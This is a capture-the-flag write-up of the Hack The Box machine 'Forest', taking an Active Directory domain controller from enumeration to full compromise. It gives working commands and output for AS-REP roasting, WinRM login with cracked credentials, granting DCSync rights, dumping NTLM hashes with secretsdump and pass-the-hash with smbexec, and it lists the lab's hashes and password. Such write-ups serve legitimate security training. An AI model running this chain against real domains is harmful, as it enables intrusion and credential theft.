HTB Writeup: Forest

It is fool to expect animals in active directory forest. Or is it?

Enumeration

nmap scan

[email protected] Forest please nmap -sC -sV -T3 -oA nmap-tcp-all-ports -p- -iL ip.txt
[sudo] password for mostwanted002:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-23 18:24 IST
Nmap scan report for 10.129.95.210 (10.129.95.210)
Host is up (0.074s latency).
Not shown: 65512 closed tcp ports (reset)
PORT      STATE SERVICE      VERSION
53/tcp    open  domain       Simple DNS Plus
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2022-06-23 13:01:56Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49671/tcp open  msrpc        Microsoft Windows RPC
49680/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49681/tcp open  msrpc        Microsoft Windows RPC
49685/tcp open  msrpc        Microsoft Windows RPC
49701/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2022-06-23T13:02:50
|_  start_date: 2022-06-23T12:59:00
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2022-06-23T06:02:46-07:00
|_clock-skew: mean: 2h26m51s, deviation: 4h02m29s, median: 6m50s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 117.20 seconds
  1. It is found that Kerberos Domain Controller is available on the remote target, which implies:
    1. Host is a part of an Active Directory Domain (htb.local) (from nmap)
    2. Host is a domain controller. (Windows Server 2016) (from nmap)

RPC Enumeration

  1. Enumerating AD properties using rpcclient provides following information:

    Domain Info

       
    rpcclient $> querydominfo
    Domain:         HTB
    Server:
    Comment:
    Total Users:    105
    Total Groups:   0
    Total Aliases:  0
    Sequence No:    1
    Force Logoff:   -1
    Domain Server State:    0x1
    Server Role:    ROLE_DOMAIN_PDC
    Unknown 3:      0x1
       
    rpcclient $> lookupdomain htb.local                                                                                                                                                                                                                                                     SAMR_LOOKUP_DOMAIN: Domain Name: htb.local Domain SID: S-1-5-21-3072663084-364016917-1341370565
    

    Domain Users

    rpcclient $> enumdomusers
    user:[Administrator] rid:[0x1f4]
    user:[Guest] rid:[0x1f5]
    user:[krbtgt] rid:[0x1f6]
    user:[DefaultAccount] rid:[0x1f7]
    user:[$331000-VK4ADACQNUCA] rid:[0x463]
    user:[SM_2c8eef0a09b545acb] rid:[0x464]
    user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
    user:[SM_75a538d3025e4db9a] rid:[0x466]
    user:[SM_681f53d4942840e18] rid:[0x467]
    user:[SM_1b41c9286325456bb] rid:[0x468]
    user:[SM_9b69f1b9d2cc45549] rid:[0x469]
    user:[SM_7c96b981967141ebb] rid:[0x46a]
    user:[SM_c75ee099d0a64c91b] rid:[0x46b]
    user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
    user:[HealthMailboxc3d7722] rid:[0x46e]
    user:[HealthMailboxfc9daad] rid:[0x46f]
    user:[HealthMailboxc0a90c9] rid:[0x470]
    user:[HealthMailbox670628e] rid:[0x471]
    user:[HealthMailbox968e74d] rid:[0x472]
    user:[HealthMailbox6ded678] rid:[0x473]
    user:[HealthMailbox83d6781] rid:[0x474]
    user:[HealthMailboxfd87238] rid:[0x475]
    user:[HealthMailboxb01ac64] rid:[0x476]
    user:[HealthMailbox7108a4e] rid:[0x477]
    user:[HealthMailbox0659cc1] rid:[0x478]
    user:[sebastien] rid:[0x479]
    user:[lucinda] rid:[0x47a]
    user:[svc-alfresco] rid:[0x47b]
    user:[andy] rid:[0x47e]
    user:[mark] rid:[0x47f]
    user:[santi] rid:[0x480]
       
    

    Domain Groups

    rpcclient $> enumdomgroups
    group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
    group:[Domain Admins] rid:[0x200]
    group:[Domain Users] rid:[0x201]
    group:[Domain Guests] rid:[0x202]
    group:[Domain Computers] rid:[0x203]
    group:[Domain Controllers] rid:[0x204]
    group:[Schema Admins] rid:[0x206]
    group:[Enterprise Admins] rid:[0x207]
    group:[Group Policy Creator Owners] rid:[0x208]
    group:[Read-only Domain Controllers] rid:[0x209]
    group:[Cloneable Domain Controllers] rid:[0x20a]
    group:[Protected Users] rid:[0x20d]
    group:[Key Admins] rid:[0x20e]
    group:[Enterprise Key Admins] rid:[0x20f]
    group:[DnsUpdateProxy] rid:[0x44e]
    group:[Organization Management] rid:[0x450]
    group:[Recipient Management] rid:[0x451]
    group:[View-Only Organization Management] rid:[0x452]
    group:[Public Folder Management] rid:[0x453]
    group:[UM Management] rid:[0x454]
    group:[Help Desk] rid:[0x455]
    group:[Records Management] rid:[0x456]
    group:[Discovery Management] rid:[0x457]
    group:[Server Management] rid:[0x458]
    group:[Delegated Setup] rid:[0x459]
    group:[Hygiene Management] rid:[0x45a]
    group:[Compliance Management] rid:[0x45b]
    group:[Security Reader] rid:[0x45c]
    group:[Security Administrator] rid:[0x45d]
    group:[Exchange Servers] rid:[0x45e]
    group:[Exchange Trusted Subsystem] rid:[0x45f]
    group:[Managed Availability Servers] rid:[0x460]
    group:[Exchange Windows Permissions] rid:[0x461]
    group:[ExchangeLegacyInterop] rid:[0x462]
    group:[$D31000-NSEL5BRJ63V7] rid:[0x46d]
    group:[Service Accounts] rid:[0x47c]
    group:[Privileged IT Accounts] rid:[0x47d]
    group:[test] rid:[0x13ed]
       
    

    Domain Password Policy

    rpcclient $> getdompwinfo
    min_password_length: 7
    password_properties: 0x00000000
    
  2. A service account is found svc-alfresco . Enumerating further on this user, the user has default password policy (minimum 7 characters, no restrictions). Nothing interesting was found in user properties as well.

    rpcclient $> queryuser svc-alfresco
            User Name   :   svc-alfresco
            Full Name   :   svc-alfresco
            Home Drive  :
            Dir Drive   :
            Profile Path:
            Logon Script:
            Description :
            Workstations:
            Comment     :
            Remote Dial :
            Logon Time               :      Mon, 23 Sep 2019 16:39:48 IST
            Logoff Time              :      Thu, 01 Jan 1970 05:30:00 IST
            Kickoff Time             :      Thu, 01 Jan 1970 05:30:00 IST
            Password last set Time   :      Thu, 23 Jun 2022 18:59:18 IST
            Password can change Time :      Fri, 24 Jun 2022 18:59:18 IST
            Password must change Time:      Thu, 14 Sep 30828 08:18:05 IST
            unknown_2[0..31]...
            user_rid :      0x47b
            group_rid:      0x201
            acb_info :      0x00010210
            fields_present: 0x00ffffff
            logon_divs:     168
            bad_password_count:     0x00000000
            logon_count:    0x00000006
            padding1[0..7]...
            logon_hrs[0..21]...
    
  3. Since this is a service account, DONT_REQ_PREAUTH can be checked on it to verify if this account is vulnerable to ASREPRoast or not.

Initial Foothold

  1. Checking for Named Principal User using impacket script GetNPUsers.py turns out to be successful, which implies the user svc-alfresco is ASREPRoastable. Getting the hash in hashcat format with following command and cracking it gives the password for the user svc-alfresco

    GetNPUsers.py -dc-ip 10.129.95.210 htb.local/svc-alfresco -no-pass -format hashcat -outputfile svc-alfresco.hash
       
    Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
       
    [*] Getting TGT for svc-alfresco
    [email protected]:ee847ee87b8cce1fe6c245e4b1c2a06a$c6fb069422c97e501123a9226dc24cb839c3aa4d1a0e17bb0a588423e94a354c70afdf4499dbf3b20236bb75bcf745b7a77b9e56f602b19171712ce2eb0f00e177c98496d776a5fcd0d38b53f9da50d13721bfe7e8ff2ae9086409a785e357feb15f8af3a18afa60e0bec55f8ceffe81a8538fd1c23243131cc70c92e51e3508c5d96771eeb90926aa8a8e2e29caca998d9dcc34bc51173b3f38cf158c6d308387160816737c9ba327d12e60feb87a9de6098a863feec4be8b28fc9852efb32c9e1acbe51cffdc72c757d92c47d4d132cde6b24e873887f21ec944983b85289fcd7a06a23f67
    

    The hashcat mode is 18200 for Kerberos 5, AS-REP. The password was successfully cracked using rockyou.txt wordlist.

    Untitled

  2. Valid credentials, svc-alfresco:s3rvice are obtained.

  3. Using Evil-WinRM, a valid remote powershell session is obtained.

    evil-winrm -u svc-alfresco -p s3rvice -i forest.htb.local
       
    # forest.htb.local => IP of the remote host.
    

    Untitled

Privilege Escalation

Active Directory Mapping and Enumeration

Bloodhound and Sharphound

  1. Since this is an Active Directory Scenario, Bloodhound can be used to draw the layout of AD structure and can help in further enumeration.
  2. Invoking SharpHound with all collection methods and analysing the data in Bloodhound provides the following valuable information:
    1. [email protected] is a member of Service Accounts domain group.

    2. Service Accounts domain group is a member of Privileged IT Accounts domain group.

    3. Privileged IT Accounts domain is a member of Account Operators domain group.

    4. Accounts Operators domain group has GenricAll DACL (Discretionary Access Control List) on most of the domain groups. GenericAll DACL allows full control on the object.

    5. Out of all the domain groups, the one with interesting DACL is Exchange Windows Permissions domain group. It has WriteDacl on the entire domain HTB.LOCAL.

      Untitled

    6. On reading the help text for WriteDacl in Bloodhound, it is found that a user can be added with DCSync rights in the domain, which can then perform.

      Untitled

Exploitation

  1. Since svc-alfresco transitively has rights on Users domain group and Exchange Windows Permissions group, a user can be created and added to the privileged group.+

    net.exe user john password123 /add /domain
    net.exe group 'exchange windows permissions' john /add
    
  2. Since the next commands are needed to be run as htb\john and htb\john cannot PSRemote onto the domain controller, [DCSync.py](https://github.com/n00py/DCSync) can be used to provide htb\john with DCSync rights.

    python3 ./DCSync.py -dc forest.htb.local -t 'CN=john,CN=Users,DC=htb,DC=local' 'htb\john:password123'
    Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
       
    [*] Starting DCSync Attack against CN=john,CN=Users,DC=htb,DC=local
    [*] Initializing LDAP connection to forest.htb.local
    [*] Using htb\john account with password ***
    [*] LDAP bind OK
    [*] Initializing domainDumper()
    [*] Initializing LDAPAttack()
    [*] Querying domain security descriptor
    [*] Success! User john now has Replication-Get-Changes-All privileges on the domain
    [*] Try using DCSync with secretsdump.py and this user :)
    [*] Saved restore state to aclpwn-20220626-001031.restore
    
  3. Now, a DCSync can be performed with the user htb\john and NTLM hashes for all the users in the domain can now be obtained.

    secretsdump.py 'htb/john:[email protected]' -target-ip 10.129.224.200 -dc-ip 10.129.224.200
       
    Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
       
    [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
    [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
    [*] Using the DRSUAPI method to get NTDS.DIT secrets
    htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
    DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    htb.local\sebastien:1145:aad3b435b51404eeaad3b435b51404ee:96246d980e3a8ceacbf9069173fa06fc:::
    htb.local\lucinda:1146:aad3b435b51404eeaad3b435b51404ee:4c2af4b2cd8a15b1ebd0ef6c58b879c3:::
    htb.local\svc-alfresco:1147:aad3b435b51404eeaad3b435b51404ee:9248997e4ef68ca2bb47ae4e6f128668:::
    htb.local\andy:1150:aad3b435b51404eeaad3b435b51404ee:29dfccaf39618ff101de5165b19d524b:::
    htb.local\mark:1151:aad3b435b51404eeaad3b435b51404ee:9e63ebcb217bf3c6b27056fdcb6150f7:::
    htb.local\santi:1152:aad3b435b51404eeaad3b435b51404ee:483d4c70248510d8e0acb6066cd89072:::
    john:10101:aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da:::
    FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:20a870de75e825622c71d13adcf223cb:::
    EXCH01$:1103:aad3b435b51404eeaad3b435b51404ee:050105bb043f5b8ffc3a9fa99b5ef7c1:::
    ...
    ...
    ...
    
  4. After the DCSync rights are obtained successfully, a remote session on the domain controller can now be obtained using smbexec.py from Impacket toolkit.

    smbexec.py -dc-ip 10.129.95.210 htb.local/[email protected] -hashes "aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6"
    

    Untitled

The remote target active directory environment is now completely compromised. For persistence, a Golden-Ticket can be issued using krbtgt hash dumped from DCSync.

Avatar
Mayank Malik
CRTP | Incident Responder | Synack Red Team Member | Threat Analyst | Security Researcher | Cloud/Network Architect

Mayank Malik is a tech savvy person, Red Team Enthusiast, and likes to wander around to learn new stuff. Cryptography, Networking and System Administrations are his forte. He’s one of the Founding Members for CTF Team, Abs0lut3Pwn4g3, and Core Member at DC 91120 (DEFCON Community Group). Apart from the mentioned skills, he’s good at communication skills and is goal oriented person. Yellow belt holder at pwn.college in pursue of learning and achieving Blue Belt.

Related